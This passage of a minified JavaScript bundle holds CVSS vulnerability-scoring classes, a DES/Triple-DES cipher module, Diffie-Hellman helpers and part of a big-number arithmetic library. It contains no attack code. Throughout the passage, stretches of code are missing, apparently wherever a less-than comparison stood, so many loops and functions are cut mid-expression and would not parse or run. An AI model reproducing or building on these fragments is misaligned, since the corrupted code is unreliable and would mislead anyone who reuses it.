Level",this.cvss)*E.get("Report Confidence",this.cvss))}},{key:"getEnvironmentalScore",value:function(){var z=1.176*(.6*Math.min(10,10.41*(1-(1-E.get("Confidentiality",this.cvss)*E.get("Confidentiality Requirement",this.cvss))*(1-E.get("Integrity",this.cvss)*E.get("Integrity Requirement",this.cvss))*(1-E.get("Availability",this.cvss)*E.get("Availability Requirement",this.cvss))))+.4*this.getExploitabilityScore()-1.5),l=Object(j.round)(z*E.get("Exploitability",this.cvss)*E.get("Remediation Level",this.cvss)*E.get("Report Confidence",this.cvss));return Object(j.round)((l+(10-l)*E.get("Collateral Damage Potential",this.cvss))*E.get("Target Distribution",this.cvss))}}])&&U(ve.prototype,le),ye&&U(ve,ye),se}();function _(se,ve){for(var le=0;le0&&(f="Changed"===this.cvss.Scope?Math.min(1.08*(z+l),10):Math.min(z+l,10)),Object(j.roundUp)(f)}},{key:"getTemporalScore",value:function(){return Object(j.roundUp)(this.getBaseScore()*y.get("Exploit Code Maturity",this.cvss)*y.get("Remediation Level",this.cvss)*y.get("Report Confidence",this.cvss))}},{key:"getEnvironmentalScore",value:function(){var z=0,l=Math.min(1-(1-y.get("Modified Confidentiality",this.cvss)*y.get("Confidentiality Requirement",this.cvss))*(1-y.get("Modified Integrity",this.cvss)*y.get("Integrity Requirement",this.cvss))*(1-y.get("Modified Availability",this.cvss)*y.get("Availability Requirement",this.cvss)),.915),f="Changed"===this.cvss["Modified Scope"]?7.52*(l-.029)-3.25*Math.pow(l-.02,15):6.42*l,v=8.22*y.get("Modified Attack Vector",this.cvss)*y.get("Modified Attack Complexity",this.cvss)*y.get("Modified Privilege Required",this.cvss)*y.get("Modified User Interaction",this.cvss);return f>0&&(z="Changed"===this.cvss["Modified Scope"]?Object(j.roundUp)(Math.min(1.08*(f+v),10))*y.get("Exploit Code Maturity",this.cvss)*y.get("Remediation Level",this.cvss)*y.get("Report Confidence",this.cvss):Object(j.roundUp)(Math.min(f+v,10))*y.get("Exploit Code Maturity",this.cvss)*y.get("Remediation Level",this.cvss)*y.get("Report Confidence",this.cvss)),Object(j.roundUp)(z)}}])&&_(ve.prototype,le),ye&&_(ve,ye),se}();function D(se,ve){for(var le=0;lese.length)&&(ve=se.length);for(var le=0,ye=new Array(ve);le0&&(f="Changed"===this.cvss.Scope?Math.min(1.08*(z+l),10):Math.min(z+l,10)),Object(j.roundUp)(f)}},{key:"getTemporalScore",value:function(){return Object(j.roundUp)(this.getBaseScore()*w.get("Exploit Code Maturity",this.cvss)*w.get("Remediation Level",this.cvss)*w.get("Report Confidence",this.cvss))}},{key:"getEnvironmentalScore",value:function(){var z=0,l=Math.min(1-(1-w.get("Modified Confidentiality",this.cvss)*w.get("Confidentiality Requirement",this.cvss))*(1-w.get("Modified Integrity",this.cvss)*w.get("Integrity Requirement",this.cvss))*(1-w.get("Modified Availability",this.cvss)*w.get("Availability Requirement",this.cvss)),.915),f="Changed"===this.cvss["Modified Scope"]?7.52*(l-.029)-3.25*Math.pow(.9731*l-.02,13):6.42*l,v=8.22*w.get("Modified Attack Vector",this.cvss)*w.get("Modified Attack Complexity",this.cvss)*w.get("Modified Privilege Required",this.cvss)*w.get("Modified User Interaction",this.cvss);return f>0&&(z="Changed"===this.cvss["Modified Scope"]?Object(j.roundUp)(Math.min(1.08*(f+v),10))*w.get("Exploit Code Maturity",this.cvss)*w.get("Remediation Level",this.cvss)*w.get("Report Confidence",this.cvss):Object(j.roundUp)(Math.min(f+v,10))*w.get("Exploit Code Maturity",this.cvss)*w.get("Remediation Level",this.cvss)*w.get("Report Confidence",this.cvss)),Object(j.roundUp)(z)}}])&&D(ve.prototype,le),ye&&D(ve,ye),se}()},ee=function(){function se(z,l){(function(f,v){if(!(f instanceof v))throw new TypeError("Cannot call a class as a function")})(this,se),this.cvssString=z,this.cvssMap=Object(j.parseCvssVector)(z,l,K),this.cvssClass=l||K[this.cvssMap.short.CVSS],this.obj=new this.cvssClass(this.cvssMap.long)}var ve,le;return ve=se,(le=[{key:"getImpactScore",value:function(){return Object(j.roundUp)(this.obj.getImpactScore())}},{key:"getExploitabilityScore",value:function(){return Object(j.roundUp)(this.obj.getExploitabilityScore())}},{key:"getBaseScore",value:function(){return Object(j.roundUp)(this.obj.getBaseScore())}},{key:"getTemporalScore",value:function(){return Object(j.roundUp)(this.obj.getTemporalScore())}},{key:"getEnvironmentalScore",value:function(){return Object(j.roundUp)(this.obj.getEnvironmentalScore())}},{key:"getRating",value:function(){var z=this.getBaseScore();return 0===z?"None":z<4?"Low":z<7?"Medium":z<9?"High":"Critical"}},{key:"getVersion",value:function(){return this.cvssMap.short.CVSS}},{key:"getVector",value:function(){return this.cvssMap.short}},{key:"getLongVector",value:function(){return this.cvssMap.long}},{key:"isEqual",value:function(z){for(var l=0,f=Object.entries(z.getVector());l{"use strict";we.utils=de(5354),we.Cipher=de(5154),we.DES=de(220),we.CBC=de(6404),we.EDE=de(8258)},6404:(Pe,we,de)=>{"use strict";var ie=de(490),j=de(2270),Q={};function ae($){ie.equal($.length,8,"Invalid IV length"),this.iv=new Array(8);for(var U=0;U{"use strict";var ie=de(490);function j(Q){this.options=Q,this.type=this.options.type,this.blockSize=8,this._init(),this.buffer=new Array(this.blockSize),this.bufferOff=0,this.padding=!1!==Q.padding}Pe.exports=j,j.prototype._init=function(){},j.prototype.update=function(ae){return 0===ae.length?[]:"decrypt"===this.type?this._updateDecrypt(ae):this._updateEncrypt(ae)},j.prototype._buffer=function(ae,I){for(var $=Math.min(this.buffer.length-this.bufferOff,ae.length-I),U=0;U<$;U++)this.buffer[this.bufferOff+U]=ae[I+U];return this.bufferOff+=$,$},j.prototype._flushBuffer=function(ae,I){return this._update(this.buffer,0,ae,I),this.bufferOff=0,this.blockSize},j.prototype._updateEncrypt=function(ae){var I=0,$=0,E=new Array(((this.bufferOff+ae.length)/this.blockSize|0)*this.blockSize);0!==this.bufferOff&&(I+=this._buffer(ae,I),this.bufferOff===this.buffer.length&&($+=this._flushBuffer(E,$)));for(var C=ae.length-(ae.length-I)%this.blockSize;I0;U--)I+=this._buffer(ae,I),$+=this._flushBuffer(E,$);return I+=this._buffer(ae,I),E},j.prototype.final=function(ae){var I,$;return ae&&(I=this.update(ae)),$="encrypt"===this.type?this._finalEncrypt():this._finalDecrypt(),I?I.concat($):$},j.prototype._pad=function(ae,I){if(0===I)return!1;for(;I{"use strict";var ie=de(490),j=de(2270),Q=de(5354),ae=de(5154);function I(){this.tmp=new Array(2),this.keys=null}function $(E){ae.call(this,E);var C=new I;this._desState=C,this.deriveKeys(C,E.key)}j($,ae),Pe.exports=$,$.create=function(C){return new $(C)};var U=[1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1];$.prototype.deriveKeys=function(C,b){C.keys=new Array(32),ie.equal(b.length,this.blockSize,"Invalid key length");var _=Q.readUInt32BE(b,0),y=Q.readUInt32BE(b,4);Q.pc1(_,y,C.tmp,0),_=C.tmp[0],y=C.tmp[1];for(var A=0;A>>1];_=Q.r28shl(_,p),y=Q.r28shl(y,p),Q.pc2(_,y,C.keys,A)}},$.prototype._update=function(C,b,_,y){var A=this._desState,p=Q.readUInt32BE(C,b),D=Q.readUInt32BE(C,b+4);Q.ip(p,D,A.tmp,0),p=A.tmp[0],D=A.tmp[1],"encrypt"===this.type?this._encrypt(A,p,D,A.tmp,0):this._decrypt(A,p,D,A.tmp,0),D=A.tmp[1],Q.writeUInt32BE(_,p=A.tmp[0],y),Q.writeUInt32BE(_,D,y+4)},$.prototype._pad=function(C,b){if(!1===this.padding)return!1;for(var _=C.length-b,y=b;y>>0,p=K}Q.rip(D,p,y,A)},$.prototype._decrypt=function(C,b,_,y,A){for(var p=_,D=b,w=C.keys.length-2;w>=0;w-=2){var x=C.keys[w],S=C.keys[w+1];Q.expand(p,C.tmp,0);var O=Q.substitute(x^=C.tmp[0],S^=C.tmp[1]),K=p;p=(D^Q.permute(O))>>>0,D=K}Q.rip(p,D,y,A)}},8258:(Pe,we,de)=>{"use strict";var ie=de(490),j=de(2270),Q=de(5154),ae=de(220);function I(U,E){ie.equal(E.length,24,"Invalid key length");var C=E.slice(0,8),b=E.slice(8,16),_=E.slice(16,24);this.ciphers="encrypt"===U?[ae.create({type:"encrypt",key:C}),ae.create({type:"decrypt",key:b}),ae.create({type:"encrypt",key:_})]:[ae.create({type:"decrypt",key:_}),ae.create({type:"encrypt",key:b}),ae.create({type:"decrypt",key:C})]}function $(U){Q.call(this,U);var E=new I(this.type,this.options.key);this._edeState=E}j($,Q),Pe.exports=$,$.create=function(E){return new $(E)},$.prototype._update=function(E,C,b,_){var y=this._edeState;y.ciphers[0]._update(E,C,b,_),y.ciphers[1]._update(b,_,b,_),y.ciphers[2]._update(b,_,b,_)},$.prototype._pad=ae.prototype._pad,$.prototype._unpad=ae.prototype._unpad},5354:(Pe,we)=>{"use strict";we.readUInt32BE=function(ae,I){return(ae[0+I]<<24|ae[1+I]<<16|ae[2+I]<<8|ae[3+I])>>>0},we.writeUInt32BE=function(ae,I,$){ae[0+$]=I>>>24,ae[1+$]=I>>>16&255,ae[2+$]=I>>>8&255,ae[3+$]=255&I},we.ip=function(ae,I,$,U){for(var E=0,C=0,b=6;b>=0;b-=2){for(var _=0;_<=24;_+=8)E<<=1,E|=I>>>_+b&1;for(_=0;_<=24;_+=8)E<<=1,E|=ae>>>_+b&1}for(b=6;b>=0;b-=2){for(_=1;_<=25;_+=8)C<<=1,C|=I>>>_+b&1;for(_=1;_<=25;_+=8)C<<=1,C|=ae>>>_+b&1}$[U+0]=E>>>0,$[U+1]=C>>>0},we.rip=function(ae,I,$,U){for(var E=0,C=0,b=0;b<4;b++)for(var _=24;_>=0;_-=8)E<<=1,E|=I>>>_+b&1,E<<=1,E|=ae>>>_+b&1;for(b=4;b<8;b++)for(_=24;_>=0;_-=8)C<<=1,C|=I>>>_+b&1,C<<=1,C|=ae>>>_+b&1;$[U+0]=E>>>0,$[U+1]=C>>>0},we.pc1=function(ae,I,$,U){for(var E=0,C=0,b=7;b>=5;b--){for(var _=0;_<=24;_+=8)E<<=1,E|=I>>_+b&1;for(_=0;_<=24;_+=8)E<<=1,E|=ae>>_+b&1}for(_=0;_<=24;_+=8)E<<=1,E|=I>>_+b&1;for(b=1;b<=3;b++){for(_=0;_<=24;_+=8)C<<=1,C|=I>>_+b&1;for(_=0;_<=24;_+=8)C<<=1,C|=ae>>_+b&1}for(_=0;_<=24;_+=8)C<<=1,C|=ae>>_+b&1;$[U+0]=E>>>0,$[U+1]=C>>>0},we.r28shl=function(ae,I){return ae<>>28-I};var de=[14,11,17,4,27,23,25,0,13,22,7,18,5,9,16,24,2,20,12,21,1,8,15,26,15,4,25,19,9,1,26,16,5,11,23,8,12,7,17,0,22,3,10,14,6,20,27,24];we.pc2=function(ae,I,$,U){for(var E=0,C=0,b=de.length>>>1,_=0;_>>de[_]&1;for(_=b;_>>de[_]&1;$[U+0]=E>>>0,$[U+1]=C>>>0},we.expand=function(ae,I,$){var U=0,E=0;U=(1&ae)<<5|ae>>>27;for(var C=23;C>=15;C-=4)U<<=6,U|=ae>>>C&63;for(C=11;C>=3;C-=4)E|=ae>>>C&63,E<<=6;E|=(31&ae)<<1|ae>>>31,I[$+0]=U>>>0,I[$+1]=E>>>0};var ie=[14,0,4,15,13,7,1,4,2,14,15,2,11,13,8,1,3,10,10,6,6,12,12,11,5,9,9,5,0,3,7,8,4,15,1,12,14,8,8,2,13,4,6,9,2,1,11,7,15,5,12,11,9,3,7,14,3,10,10,0,5,6,0,13,15,3,1,13,8,4,14,7,6,15,11,2,3,8,4,14,9,12,7,0,2,1,13,10,12,6,0,9,5,11,10,5,0,13,14,8,7,10,11,1,10,3,4,15,13,4,1,2,5,11,8,6,12,7,6,12,9,0,3,5,2,14,15,9,10,13,0,7,9,0,14,9,6,3,3,4,15,6,5,10,1,2,13,8,12,5,7,14,11,12,4,11,2,15,8,1,13,1,6,10,4,13,9,0,8,6,15,9,3,8,0,7,11,4,1,15,2,14,12,3,5,11,10,5,14,2,7,12,7,13,13,8,14,11,3,5,0,6,6,15,9,0,10,3,1,4,2,7,8,2,5,12,11,1,12,10,4,14,15,9,10,3,6,15,9,0,0,6,12,10,11,1,7,13,13,8,15,9,1,4,3,5,14,11,5,12,2,7,8,2,4,14,2,14,12,11,4,2,1,12,7,4,10,7,11,13,6,1,8,5,5,0,3,15,15,10,13,3,0,9,14,8,9,6,4,11,2,8,1,12,11,7,10,1,13,14,7,2,8,13,15,6,9,15,12,0,5,9,6,10,3,4,0,5,14,3,12,10,1,15,10,4,15,2,9,7,2,12,6,9,8,5,0,6,13,1,3,13,4,14,14,0,7,11,5,3,11,8,9,4,14,3,15,2,5,12,2,9,8,5,12,15,3,10,7,11,0,14,4,1,10,7,1,6,13,0,11,8,6,13,4,13,11,0,2,11,14,7,15,4,0,9,8,1,13,10,3,14,12,3,9,5,7,12,5,2,10,15,6,8,1,6,1,6,4,11,11,13,13,8,12,1,3,4,7,10,14,7,10,9,15,5,6,0,8,15,0,14,5,2,9,3,2,12,13,1,2,15,8,13,4,8,6,10,15,3,11,7,1,4,10,12,9,5,3,6,14,11,5,0,0,14,12,9,7,2,7,2,11,1,4,14,1,7,9,4,12,10,14,8,2,13,0,15,6,12,10,9,13,0,15,3,3,5,5,6,8,11];we.substitute=function(ae,I){for(var $=0,U=0;U<4;U++)$<<=4,$|=ie[64*U+(ae>>>18-6*U&63)];for(U=0;U<4;U++)$<<=4,$|=ie[256+64*U+(I>>>18-6*U&63)];return $>>>0};var j=[16,25,12,11,3,20,4,15,31,17,9,6,27,14,1,22,30,24,8,18,0,5,29,23,13,19,2,26,10,21,28,7];we.permute=function(ae){for(var I=0,$=0;$>>j[$]&1;return I>>>0},we.padSplit=function(ae,I,$){for(var U=ae.toString(2);U.length{var ie=de(5449).Buffer,j=de(3193),Q=de(9799),ae=de(2625),$={binary:!0,hex:!0,base64:!0};we.DiffieHellmanGroup=we.createDiffieHellmanGroup=we.getDiffieHellman=function I(E){var C=new ie(Q[E].prime,"hex"),b=new ie(Q[E].gen,"hex");return new ae(C,b)},we.createDiffieHellman=we.DiffieHellman=function U(E,C,b,_){return ie.isBuffer(C)||void 0===$[C]?U(E,"binary",C,b):(C=C||"binary",_=_||"binary",b=b||new ie([2]),ie.isBuffer(b)||(b=new ie(b,_)),"number"==typeof E?new ae(j(E,b),b,!0):(ie.isBuffer(E)||(E=new ie(E,C)),new ae(E,b,!0)))}},2625:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(4424),ae=new(de(2465)),I=new j(24),$=new j(11),U=new j(10),E=new j(3),C=new j(7),b=de(3193),_=de(2419);function y(S,O){return O=O||"utf8",ie.isBuffer(S)||(S=new ie(S,O)),this._pub=new j(S),this}function A(S,O){return O=O||"utf8",ie.isBuffer(S)||(S=new ie(S,O)),this._priv=new j(S),this}Pe.exports=w;var p={};function w(S,O,B){this.setGenerator(O),this.__prime=new j(S),this._prime=j.mont(this.__prime),this._primeLen=S.length,this._pub=void 0,this._priv=void 0,this._primeCode=void 0,B?(this.setPublicKey=y,this.setPrivateKey=A):this._primeCode=8}function x(S,O){var B=new ie(S.toArray());return O?B.toString(O):B}Object.defineProperty(w.prototype,"verifyError",{enumerable:!0,get:function(){return"number"!=typeof this._primeCode&&(this._primeCode=function D(S,O){var B=O.toString("hex"),K=[B,S.toString(16)].join("_");if(K in p)return p[K];var se,ee=0;if(S.isEven()||!b.simpleSieve||!b.fermatTest(S)||!ae.test(S))return ee+=1,p[K]=ee+="02"===B||"05"===B?8:4,ee;switch(ae.test(S.shrn(1))||(ee+=2),B){case"02":S.mod(I).cmp($)&&(ee+=8);break;case"05":(se=S.mod(U)).cmp(E)&&se.cmp(C)&&(ee+=8);break;default:ee+=4}return p[K]=ee,ee}(this.__prime,this.__gen)),this._primeCode}}),w.prototype.generateKeys=function(){return this._priv||(this._priv=new j(_(this._primeLen))),this._pub=this._gen.toRed(this._prime).redPow(this._priv).fromRed(),this.getPublicKey()},w.prototype.computeSecret=function(S){var O=(S=(S=new j(S)).toRed(this._prime)).redPow(this._priv).fromRed(),B=new ie(O.toArray()),K=this.getPrime();if(B.length{var ie=de(2419);Pe.exports=K,K.simpleSieve=O,K.fermatTest=B;var j=de(4424),Q=new j(24),I=new(de(2465)),$=new j(1),U=new j(2),E=new j(5),_=(new j(16),new j(8),new j(10)),y=new j(3),p=(new j(7),new j(11)),D=new j(4),x=(new j(12),null);function O(ee){for(var se=function S(){if(null!==x)return x;var se=[];se[0]=2;for(var ve=1,le=3;le<1048576;le+=2){for(var ye=Math.ceil(Math.sqrt(le)),z=0;zee;)ve.ishrn(1);if(ve.isEven()&&ve.iadd($),ve.testn(1)||ve.iadd(U),se.cmp(U)){if(!se.cmp(E))for(;ve.mod(_).cmp(y);)ve.iadd(D)}else for(;ve.mod(Q).cmp(p);)ve.iadd(D);if(O(le=ve.shrn(1))&&O(ve)&&B(le)&&B(ve)&&I.test(le)&&I.test(ve))return ve}}},4424:function(Pe,we,de){!function(ie,j){"use strict";function Q(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var $;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{$="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(7748).Buffer}catch(z){}function U(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var v=U(z,f);return f-1>=l&&(v|=U(z,f-1)<<4),v}function C(z,l,f,v){for(var M=0,P=Math.min(z.length,f),G=l;G=49?X-49+10:X>=17?X-17+10:X}return M}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,v){if("number"==typeof l)return this._initNumber(l,f,v);if("object"==typeof l)return this._initArray(l,f,v);"hex"===f&&(f=16),Q(f===(0|f)&&f>=2&&f<=36);var M=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(M++,this.negative=1),M=0;M-=3)this.words[P]|=(G=l[M]|l[M-1]<<8|l[M-2]<<16)<>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===v)for(M=0,P=0;M>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,v){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var M=0;M=f;M-=2)X=E(l,f,M)<=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(M=(l.length-f)%2==0?f+1:f;M=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,v){this.words=[0],this.length=1;for(var M=0,P=1;P<=67108863;P*=f)M++;M--,P=P/f|0;for(var G=l.length-v,X=G%M,L=Math.min(G,G-X)+v,h=0,R=v;R1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?""};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var v=z.length+l.length|0;f.length=v,v=v-1|0;var M=0|z.words[0],P=0|l.words[0],G=M*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(M=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var v;if(f=0|f||1,16===(l=l||10)||"hex"===l){v="";for(var M=0,P=0,G=0;G>>24-M&16777215)||G!==this.length-1?b[6-L.length]+L+v:L+v,(M+=2)>=26&&(M-=26,G--)}for(0!==P&&(v=P.toString(16)+v);v.length%f!=0;)v="0"+v;return 0!==this.negative&&(v="-"+v),v}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];v="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);v=(J=J.idivn(R)).isZero()?Z+v:b[h-Z.length]+Z+v}for(this.isZero()&&(v="0"+v);v.length%f!=0;)v="0"+v;return 0!==this.negative&&(v="-"+v),v}Q(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&Q(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return Q(void 0!==$),this.toArrayLike($,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,v){var M=this.byteLength(),P=v||Math.max(1,M);Q(M<=P,"byte array longer than desired length"),Q(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h=4096&&(v+=13,f>>>=13),f>=64&&(v+=7,f>>>=7),f>=8&&(v+=4,f>>>=4),f>=2&&(v+=2,f>>>=2),v+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,v=0;return 0==(8191&f)&&(v+=13,f>>>=13),0==(127&f)&&(v+=7,f>>>=7),0==(15&f)&&(v+=4,f>>>=4),0==(3&f)&&(v+=2,f>>>=2),0==(1&f)&&v++,v},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;fl.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var v=0;vl.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,v;this.length>l.length?(f=this,v=l):(f=l,v=this);for(var M=0;Ml.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){Q("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),v=l%26;this._expand(f),v>0&&f--;for(var M=0;M0&&(this.words[M]=~this.words[M]&67108863>>26-v),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){Q("number"==typeof l&&l>=0);var v=l/26|0,M=l%26;return this._expand(v+1),this.words[v]=f?this.words[v]|1<l.length?(v=this,M=l):(v=l,M=this);for(var P=0,G=0;G>>26;for(;0!==P&&G>>26;if(this.length=v.length,0!==P)this.words[this.length]=P,this.length++;else if(v!==this)for(;Gl.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var M,P,v=this.cmp(l);if(0===v)return this.negative=0,this.length=1,this.words[0]=0,this;v>0?(M=this,P=l):(M=l,P=this);for(var G=0,X=0;X>26,this.words[X]=67108863&f;for(;0!==G&&X>26,this.words[X]=67108863&f;if(0===G&&X>>13,Ie=0|M[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|M[2],He=8191&Xe,Be=Xe>>>13,qe=0|M[3],De=8191&qe,Ve=qe>>>13,ze=0|M[4],me=8191&ze,Ke=ze>>>13,rt=0|M[5],Ge=8191&rt,Qe=rt>>>13,ht=0|M[6],mt=8191&ht,lt=ht>>>13,ft=0|M[7],xe=8191&ft,We=ft>>>13,Je=0|M[8],Oe=8191&Je,Te=Je>>>13,Le=0|M[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,pa=0|P[2],Jt=8191&pa,Gt=pa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;v.negative=l.negative^f.negative,v.length=19;var ha=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ha>>>26)|0,ha&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var 